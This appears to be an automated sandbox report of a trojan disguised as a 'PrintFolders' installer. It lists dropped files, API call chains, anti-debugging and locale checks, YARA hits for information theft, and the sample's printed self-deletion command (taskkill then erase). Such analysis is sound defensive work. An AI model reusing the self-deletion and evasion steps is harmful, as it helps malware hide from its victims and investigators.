Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70, 0_2_00408F74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70, 1_2_00453A8C
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "PrintFolders.exe")
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp
Source: classification engine Classification label: mal88.troj.evad.winEXE@12/23@0/5
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00454498 GetModuleHandleA,6D2B5550,GetDiskFreeSpaceA, 1_2_00454498
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040B1E0 FindResourceA,FreeResource, 1_2_0040B1E0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: `a}{ 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: MFE. 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1488975 > 1048576
Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr

Data Obfuscation

Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.rgw89:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406584 push 004065C1h; ret 0_2_004065B9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax 0_2_00407E89
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408B24 push 00408B57h; ret 0_2_00408B4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00409B70 push 00409BADh; ret 1_2_00409BA5
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040A257 push ds; ret 1_2_0040A258
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00478210 push 004782BBh; ret 1_2_004782B3
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040A22B push ds; ret 1_2_0040A255
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax 1_2_004063C9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax 1_2_004303A9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax 1_2_0045A751
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx 1_2_004108ED
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00412B40 push 00412BA3h; ret 1_2_00412B9B
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00450FF8 push 0045102Bh; ret 1_2_00451023
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx 1_2_0040D242
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx 1_2_00443664
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx 1_2_0047976D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx 1_2_0040F7A2
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx 1_2_00419E45
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F4BB push ecx; ret 2_2_0040F4CE
Source: PrintFolders.exe.1.dr Static PE information: section name: .rgw89
Source: initial sample Static PE information: section name: .text entropy: 7.272434889037595
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\is-2632S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423E24
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, 1_2_004243F4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004243AC IsIconic,SetActiveWindow, 1_2_004243AC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041859C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422A74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004177B0 IsIconic,GetCapture, 1_2_004177B0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00477D2C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00417EE6 IsIconic,SetWindowPos, 1_2_00417EE6
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417EE8
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-2632S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_004095D0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00451554 FindFirstFileA,GetLastError, 1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose, 1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp, PrintFolders.exe, 00000002.00000002.326024526.000000000179B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 2_2_00402F20
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] 2_2_0042041F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] 2_2_00417BAF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] 2_2_100091C7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] 2_2_10006CE1
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F789 SetUnhandledExceptionFilter, 2_2_0040F789
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F5F5
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EBD2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10006180
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_100035DF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10003AD4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D2B5550,6D2B5550,6D2B5550,AllocateAndInitializeSid,LocalFree, 1_2_004593E4
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program manager-
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_004051C8
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00405214
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: GetLocaleInfoA, 1_2_0040874C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: GetLocaleInfoA, 1_2_00408798
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, 2_2_00404D40
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_00427041
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_0042708C
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_00427127
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 2_2_004271B2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: EnumSystemLocalesW, 2_2_0041E2FF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_00427405
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_0042752B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_00427631
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_00427700
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetLocaleInfoW, 2_2_0041E821
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_00426D9F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F7F3 cpuid 2_2_0040F7F3
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D2B5CA0,SetNamedPipeHandleState,6D747180,CloseHandle,CloseHandle, 1_2_00455B2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405CB0 GetVersionExA, 0_2_00405CB0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00453A24 GetUserNameA, 1_2_00453A24

Stealing of Sensitive Information

Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.PrintFolders.exe.33a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY